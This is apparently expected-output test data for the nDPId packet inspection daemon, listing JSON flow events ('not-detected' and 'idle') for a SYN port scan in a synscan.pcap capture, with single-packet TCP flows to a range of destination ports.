+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1842,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1842,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1919,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1919,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6059,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1876,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6059,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1876,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1971,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1972,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1972,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1971,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1972,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1972,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 